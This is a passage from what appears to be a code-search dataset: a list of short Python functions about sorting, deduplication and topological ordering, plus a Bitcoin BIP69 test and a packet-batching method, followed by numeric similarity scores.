to_sort:\n shuffle(to_sort)", "def _toposort(edges):\r\n incoming_edges = reverse_dict(edges)\r\n incoming_edges = dict((k, set(val)) for k, val 
in incoming_edges.items())\r\n S = set((v for v in edges if v not in incoming_edges))\r\n L = []\r\n\r\n while S:\r\n n = S.pop()\r\n L.append(n)\r\n for m in edges.get(n, ()):\r\n assert n in incoming_edges[m]\r\n incoming_edges[m].remove(n)\r\n if not incoming_edges[m]:\r\n S.add(m)\r\n if any(incoming_edges.get(v, None) for v in edges):\r\n raise ValueError(\"Input has cycles\")\r\n return L", "def remove_with_sort(to_remove):\n slow = to_remove.head\n runner = to_remove.head\n\n while slow:\n while runner:\n if runner.next_node:\n if slow.value == runner.next_node.value:\n runner.next_node = runner.next_node.next_node\n runner = runner.next_node\n slow = slow.next_node\n try:\n runner = slow.next_node\n except:\n pass", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def sort(items):\n heapq.heapify(items)\n items[:] = [heapq.heappop(items) for i in range(len(items))]", "def _unique_sorted(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]", "def eliminate_duplicates(iterable):\n class NoElement: pass\n\n prev_elem = NoElement\n for elem in sorted(iterable):\n if prev_elem is NoElement:\n prev_elem = elem\n yield elem\n continue\n\n if prev_elem != elem:\n prev_elem = elem\n yield elem", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def sort(self):\n self.deckcards.sort()", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def sort(self):\n srt = self.sources()\n stack = list(srt) # makes a copy\n while stack:\n node = stack.pop(0)\n if (not node.isSink()):\n # if a child is not in srt, and all of its parents are in srt,\n # then add it. 
Must have all parents to get true topo sort.\n newChildren = filter(lambda x: len(set(x.parents()) - set(srt))==0,\n [child for child in node.children() if child not in srt])\n stack.extend(newChildren)\n srt.extend(newChildren)\n return srt", "def test__remove_duplicates(self):\n\n result = deduped_list\n expected = [\n 'Fred',\n 'Dave',\n 'Sarah',\n 'John',\n 'Matthew',\n 'Joanna',\n 'Marjorie',\n 'Anna',\n 'Tony',\n 'Sam',\n 'Eric',\n 'Susan',\n 'Arthur',\n ]\n\n self.assertListEqual(sorted(result), sorted(expected))", "def sort(\n tuples: Collection[Tuple[_T, _T]],\n allitems: Collection[_T],\n deterministic_order: bool = True,\n) -> Iterator[_T]:\n\n for set_ in sort_as_subsets(tuples, allitems):\n yield from set_", "def short_bubble_sort(integer_list):\n exchanged = True\n for passnum in range(len(integer_list), 1, -1):\n exchanged = False\n for i in range(passnum-1):\n if integer_list[i] > integer_list[i+1]:\n exchanged = True\n integer_list[i], integer_list[i+1] = integer_list[i+1], integer_list[i]\n if not exchanged:\n break\n return integer_list", "def natsort(lst: List[str]) -> None:\n lst.sort(key=natsort_key)", "def test_sort_all_equal():\n assert bubble_sort([1, 1, 1, 3, 4, 10, 2, 3]) == [1, 1, 1, 2, 3, 3, 4, 10]" ]
[ "0.6647256", "0.61278707", "0.60170823", "0.5986823", "0.596562", "0.5906093", "0.5628137", "0.5617985", "0.560249", "0.5601702", "0.5557772", "0.5519489", "0.55179644", "0.55005574", "0.5492273", "0.54918206", "0.5472187", "0.5472187", "0.54687566", "0.543962", "0.54305553", "0.53969437", "0.5389872", "0.537103", "0.53452706", "0.53303266", "0.532059", "0.53150225", "0.53019935", "0.52754885" ]
0.6355191
1
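
The `iter_packets` document above is a sort-then-dedupe pass over TCP segments keyed on their sequence number. A minimal sketch of its behavior, assuming only that packets expose a `seq` attribute; the `Packet` namedtuple is an illustrative stand-in, not part of the dataset:

from collections import namedtuple
from operator import attrgetter

Packet = namedtuple('Packet', ['seq', 'data'])

def iter_packets(iterable):
    prev = None

    for i in sorted(iterable, key=attrgetter('seq')):
        if prev is None or prev.seq != i.seq:
            prev = i  # remember the last emitted segment so exact duplicates are skipped
            yield i

# Out-of-order input comes back sorted, and the retransmitted seq=100
# segment is emitted only once.
pkts = [Packet(200, b'b'), Packet(100, b'a'), Packet(100, b'a')]
assert [p.seq for p in iter_packets(pkts)] == [100, 200]

Note the dedupe is by exact sequence number only; an overlapping retransmission that starts at a different seq would pass through untouched.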
Hashes a packet to determine the tcp stream it is part of
def hash_packet(eth, outbound=False):
    ip = eth.data
    tcp = ip.data

    return '%s:%i' % (
        ipaddr_string(ip.dst if outbound else ip.src),
        tcp.sport if outbound else tcp.dport
    )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hash_packet(packet):\n if packet.proto == 6:\n #*** Is TCP:\n packet_tuple = (packet.ip_src,\n packet.ip_dst,\n packet.proto,\n packet.tp_src,\n packet.tp_dst,\n packet.tp_seq_src,\n packet.tp_seq_dst)\n else:\n #*** Isn't a flow, so make hash unique to packet by including\n #*** the DPID and timestamp in the hash:\n packet_tuple = (packet.eth_src,\n packet.eth_dst,\n packet.eth_type,\n packet.dpid,\n packet.timestamp)\n return hash_tuple(packet_tuple)", "def spoof_packet(packet):", "def send_packet(hash_str, size, s, d, count_dict, count_dict1, mark_dict, \n threshold, mark_group, seeds, polys, min_len, \n flow_paths, cflow_dict, app_link_dict, app_link_flow_dict, switch_nodes, table, select_dict, drop_id=0, r_threshold=0.0, black_hole='sh41', test_hop='',\n add_byte_dict=OrderedDict({}), w_key=''):\n pkt_mark = \"0\"\n if len(select_dict) < 1000000:\n pkt_mark = mf.mark_random(p=1.0)\n hash_str += pkt_mark\n if hash_str not in mark_dict:\n mark_dict[hash_str] = 0\n mark_dict[hash_str] += 1\n min_len = next_hop_rand_mark(\n s, 'h1', s, d, hash_str, size, table, seeds, polys, min_len, \n flow_paths, cflow_dict, app_link_dict, app_link_flow_dict, select_dict,\n drop_id=drop_id, r_threshold=r_threshold, black_hole=black_hole, \n test_hop=test_hop, add_byte_dict=add_byte_dict, w_key=w_key\n )\n return min_len", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def tcp_shasum_calc(src: bytes, dst: bytes, proto: int, payload: bytes) -> bytes:\n _sum = struct.pack(\">4s4sxBH\", src, dst, proto, len(payload))\n if isinstance(payload, str):\n payload = payload.encode()\n return hash_digest(_sum + payload)", "def tcp_fix_checksum(pkt: dpkt.ethernet.Ethernet) -> dpkt.ethernet.Ethernet:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n tcp = ip.data\n tcp.sum = 0\n payload = bytes(tcp)\n _sum = dpkt.struct.pack('>4s4sxBH', ip.src, ip.dst, ip.p, len(payload))\n _sum = dpkt.in_cksum_add(0, _sum)\n _sum = dpkt.in_cksum_add(_sum, payload)\n tcp.sum = dpkt.in_cksum_done(_sum)\n ip.data = tcp\n ip.sum = 0\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip.sum = dpkt.in_cksum(ip.pack_hdr() + bytes(ip.opts))\n pkt.data = ip\n return pkt", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see 
if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def tcp_reassembly(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n bufid=(\n ipaddress.ip_address(ip.src), # source IP address\n ipaddress.ip_address(ip.dst), # destination IP address\n tcp.sport, # source port\n tcp.dport, # destination port\n ),\n num=count, # original packet range number\n ack=tcp.ack, # acknowledgement\n dsn=tcp.seq, # data sequence number\n syn=bool(tcp.flags.S), # synchronise flag\n fin=bool(tcp.flags.F), # finish flag\n rst=bool(tcp.flags.R), # reset connection flag\n payload=bytearray(bytes(tcp.payload)), # raw bytearray type payload\n )\n raw_len = len(tcp.payload) # payload length, header excludes\n data['first'] = tcp.seq # this sequence number\n data['last'] = tcp.seq + raw_len # next (wanted) sequence number\n data['len'] = raw_len # payload length, header excludes\n return True, data\n return False, None", "def makePacket(bytes):\n header = makePacketHeader(bytes[0:8])\n md5 = bytes[8:24]\n data = bytes[24:24 + header.length]\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! 
(expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def check_packet(self, header, string):\n\n string = string[0:11] + string[75:]\n gen_chksum = hashlib.sha256(string.encode()).hexdigest()\n try:\n if header[\"checksum\"] == gen_chksum:\n return True\n else:\n return False\n except KeyError:\n return False", "def hash_flow(flow_5_tuple):\n ip_A = flow_5_tuple[0]\n ip_B = flow_5_tuple[1]\n tp_src = flow_5_tuple[2]\n tp_dst = flow_5_tuple[3]\n proto = flow_5_tuple[4]\n if proto == 6:\n #*** Is a TCP flow:\n if ip_A > ip_B:\n direction = 1\n elif ip_B > ip_A:\n direction = 2\n elif tp_src > tp_dst:\n direction = 1\n elif tp_dst > tp_src:\n direction = 2\n else:\n direction = 1\n else:\n #*** Isn't a flow, so arbitrarily set direction as 1:\n direction = 1\n if direction == 1:\n flow_tuple = (ip_A, ip_B, tp_src, tp_dst, proto)\n else:\n #*** Flip direction:\n flow_tuple = (ip_B, ip_A, tp_dst, tp_src, proto)\n return hash_tuple(flow_tuple)", "def _compute_checksum(packet):\n # checksum is the sum of the bytes\n # from device id to the end of the data\n # mod (%) 256 and bit negated (~) (1's compliment)\n # and (&) with 0xFF to make sure it is a byte.\n return ~(sum(packet[2:]) % 0x100) & 0xFF", "def __process_ethframe(self, eth_header: bytes) -> Dict[str, Any]:\n eth = struct.unpack('!6s6sH', eth_header)\n eth_protocol = socket.ntohs(eth[2])\n\n return {\n 'header_length': Sniffer.ETH_HEADER_LENGTH,\n 'protocol': eth_protocol,\n }", "def make_packet(self, string):\n\n string = string[:2] + \"checksum:,\" + string[2:]\n chksum = hashlib.sha256(string.encode()).hexdigest()\n string = string[:11] + chksum + string[11:]\n return string", "def count_md5hash_bytes(byte_flow):\n hash_md5 = hashlib.md5()\n hash_md5.update(byte_flow)\n return hash_md5.hexdigest()", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 
6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def trackerhash(type):\n t_hash = urandom(20)\n if type == 'udp':\n return t_hash\n if type == 'http':\n return quote_from_bytes(t_hash)", "def readPacketHeader(stream):\n return makePacketHeader(stream.read(8))", "def get_tcp_packet_fingerprint_info(self, packet, relative_time):\n\n size = self.get_packet_size(packet, TCP)\n time = packet.time - relative_time\n direction = self.get_packet_direction(packet)\n return str(time) + '\\t' + str(direction*size)", "def get_socket_hash(socket):\r\n return hash(socket.id_data.name + socket.node.name + socket.identifier)", "def process_message(msg):\r\n print(\"received \")\r\n global bytes_in\r\n if len(msg) == 200: # is header or end\r\n print(\"found header\")\r\n msg_in = msg.decode(\"utf-8\")\r\n msg_in = msg_in.split(\",,\")\r\n print(msg_in)\r\n if msg_in[0] == \"end\": # is it really last packet?\r\n in_hash_final = in_hash_md5.hexdigest()\r\n if in_hash_final == msg_in[2]:\r\n print(\"File copied OK -valid hash \", in_hash_final)\r\n return -1\r\n else:\r\n print(\"Bad file receive \", in_hash_final)\r\n return False\r\n else:\r\n if msg_in[0] != \"header\":\r\n in_hash_md5.update(msg)\r\n return True\r\n else:\r\n return False\r\n else:\r\n bytes_in = bytes_in + len(msg)\r\n in_hash_md5.update(msg)\r\n print(\"found data bytes= \", bytes_in)\r\n return True", "def __process_tcpframe(self, tcp_header: bytes) -> Dict[str, Any]:\n tcph = struct.unpack('!HHLLBBHHH', tcp_header)\n\n # Normal stuff\n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n tcphl = (tcph[4] >> 4) * 4\n\n # TCP flags\n flags = ((tcph[4] & 1) << 8) | tcph[5]\n\n return {\n 'header_length': tcphl,\n 'source_port': source_port,\n 'destination_port': dest_port,\n 'sequence': sequence,\n 'acknowledgement': acknowledgement,\n 'flags': self.__process_flags(flags),\n }", "def frame_packet(message):\n if message in one_char_packets:\n return message\n return \"$%s#%02x\" % (message, checksum(message))", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not 
(pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def makePacketHeader(bytes):\n id = struct.unpack('!H', bytes[0:2])[0]\n length = struct.unpack('!H', bytes[2:4])[0]\n packet_count = struct.unpack('!I',bytes[4:8])[0]\n return PacketHeader(id, length, packet_count)", "def get_tcp_packet(self, sock):\n\n # the first? byte indicates the fragment status (last fragament==1?)\n # after that goes the packet size\n pkt = ''\n try:\n while True:\n psize = ''\n while True:\n psize += sock.recv(1)\n if len(psize) == 4:\n break\n p0 = psize[0]\n psize = '\\0' + psize[1:4] # remove packet number\n psize = int(struct.unpack('!I', psize)[0])\n # read actual pkt\n while True:\n pkt += sock.recv(1)\n if len(pkt) == psize:\n break\n if binascii.hexlify(p0) == '80':\n break\n except socket.timeout:\n pass\n return pkt", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def sniffing():\n sniff(store=False, prn=lambda p: threading.Thread(target=sendHash, args=(p,)).start(), iface=IFACE)", "def tcp_checksum_calc(src: bytes, dst: bytes, proto: int, payload: bytes) -> bytes:\n _sum = 
dpkt.struct.pack(\">4s4sxBH\", src, dst, proto, len(payload))\n _sum = dpkt.in_cksum_add(0, _sum)\n _sum = dpkt.in_cksum_add(_sum, payload)\n _sum = dpkt.in_cksum_done(_sum)\n return _sum" ]
[ "0.7895792", "0.661901", "0.63492525", "0.6196242", "0.6103663", "0.6019841", "0.5995078", "0.5981094", "0.59252846", "0.5890868", "0.58816797", "0.58208543", "0.5804756", "0.5796329", "0.5782937", "0.5778316", "0.574992", "0.568126", "0.56439674", "0.5617276", "0.5610319", "0.55850554", "0.5582861", "0.5580631", "0.55682504", "0.55460334", "0.55448467", "0.5512302", "0.54815364", "0.54712826" ]
0.72170126
1
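
The `hash_packet` document above derives a stream key of the form 'ip:port' from the remote endpoint, so both directions of one connection map to the same key. A sketch under stated assumptions: dpkt-style layering (`eth.data` is the IP datagram, `ip.data` the TCP segment) and a hypothetical `ipaddr_string` helper rendering a packed IPv4 address, since the real helper is not shown in the row:

import socket
from types import SimpleNamespace

def ipaddr_string(addr):
    # Hypothetical stand-in for the helper the document assumes:
    # packed 4-byte IPv4 address -> dotted-quad string.
    return socket.inet_ntoa(addr)

def hash_packet(eth, outbound=False):
    ip = eth.data
    tcp = ip.data

    return '%s:%i' % (
        ipaddr_string(ip.dst if outbound else ip.src),
        tcp.sport if outbound else tcp.dport
    )

# An outbound request and its inbound reply hash to the same stream key,
# because the remote endpoint is dst/dport on the way out and src/sport
# on the way back.
out_tcp = SimpleNamespace(sport=51000, dport=443)
out_ip = SimpleNamespace(src=socket.inet_aton('10.0.0.2'),
                         dst=socket.inet_aton('93.184.216.34'), data=out_tcp)
in_tcp = SimpleNamespace(sport=443, dport=51000)
in_ip = SimpleNamespace(src=socket.inet_aton('93.184.216.34'),
                        dst=socket.inet_aton('10.0.0.2'), data=in_tcp)

assert hash_packet(SimpleNamespace(data=out_ip), outbound=True) == '93.184.216.34:443'
assert hash_packet(SimpleNamespace(data=in_ip)) == '93.184.216.34:443'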
Iterates over next packets in the buffer and removes them
def remove_buffered_packets(self):
    seq = self.next_seq

    while True:
        p = self.buffer.pop(seq, None)

        if p is None:
            break
        else:
            seq += len(p.data)
            yield p
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def drop_packets(self, verbose=False):\n while True:\n try:\n packet, address = self._socket.recvfrom(10240)\n except:\n break\n\n if verbose:\n logger.debug(\"dropped %d bytes from %s:%d\", len(packet), address[0], address[1])", "def delete_packets(self, num):\n for i in range(num):\n del self._packets[0]", "def _check_buffer(self):\n count = 0\n for packet in self.remove_buffered_packets():\n self._append_packet(packet)\n count += 1\n\n if count > 0:\n logging.debug('Removed %i items from the buffer, %i left.' % (count, len(self.buffer)))", "def port_buffer_drop():", "def resend_buffer_packets():\n global BUFFER\n for seq in BUFFER.keys():\n packet_info = BUFFER[seq]\n msg_obj = packet_info.msg\n new_start = time.time()\n handle_packet_send(msg_obj)\n new_packet_info = PacketInfo(msg_obj, new_start)\n # Update the packet in the buffer with the new time sent at\n BUFFER[seq] = new_packet_info", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def _pop_received_packet(self):\n fragments = self._receive_heap.pop_min_and_all_fragments()\n if fragments is None:\n self._attempt_disabling_looping_receive()\n else:\n last_seqnum = fragments[-1].sequence_number\n self._update_next_expected_seqnum(last_seqnum)\n self._update_next_delivered_seqnum(last_seqnum)\n payload = b''.join(f.payload for f in fragments)\n self.handler.receive_message(payload)\n\n if self._next_delivered_seqnum not in self._receive_heap:\n self._attempt_disabling_looping_receive()", "def run(self):\r\n waiting_packet = None\r\n while True:\r\n if waiting_packet is not None:\r\n packet = waiting_packet\r\n waiting_packet = None\r\n else:\r\n packet = yield self.buffer.get()\r\n self.channel.add_sender(self)\r\n yield self.env.timeout(packet.size/self.service_rate)\r\n self.channel.remove_sender(self)\r\n packet.output_timestamp= env.now\r\n if self.destination is None:\r\n self.packet_list.append(packet)\r\n if (not self.collision):\r\n if self.destination is not None:\r\n self.destination.put(packet)\r\n self.channel.packet_list.append(packet)\r\n else:\r\n if self.debug:\r\n print(\"Packet %d is discarded. 
Reason: Collision\" \r\n % (packet.id))\r\n self.packets_drop += 1\r\n waiting_packet = packet\r\n self.collision = False\r\n yield self.env.timeout(self.random_delay())", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def _discard_excess_bytes(self):\n discard_len = min(self._discard, len(self._buffer))\n del self._buffer[:discard_len]\n self._discard -= discard_len", "def filter(self):\n # outfile = 